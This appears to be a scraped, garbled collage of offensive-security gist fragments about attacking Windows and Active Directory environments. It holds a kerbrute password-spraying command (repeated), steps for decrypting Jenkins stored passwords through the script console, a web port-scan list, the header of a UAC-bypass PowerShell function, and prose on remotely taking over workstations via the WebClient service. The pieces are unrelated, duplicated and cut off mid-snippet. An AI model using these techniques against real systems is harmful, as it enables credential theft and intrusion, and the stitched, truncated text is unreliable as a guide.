With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#To Decrypt Jenkins Password from credentials.xml | |
#<username>jenkins</username> | |
#<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase> | |
#go to the jenkins url | |
http://jenkins-host/script | |
#In the console paste the script | |
hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J' |
`-p80,81,280,443,591,593,832,981,1311,2480,4444–4445,4567,5000,5104,5800,7000-7002,8008,8042,8080,8088,8222,8243,8280,8281,8333,8530-8531,8887-8888,8000,8443,9080,9443,9981,11371,12043,12046,12443,16080,18091-18092` (edited) |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
function Invoke-UACBypass { | |
<# | |
.SYNOPSIS | |
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
Whenever you research a certain vulnerability ask yourself these questions and please answer them for us
Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)
Does a system service write a log?
(e.g. check with tail -f /var/log/messages)
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
#@author matterpreter | |
#@category | |
#@keybinding | |
#@menupath | |
#@toolbar | |
### | |
# To import to Neo4j: | |
# CREATE CONSTRAINT function_name ON (n:Function) ASSERT n.name IS UNIQUE | |
# |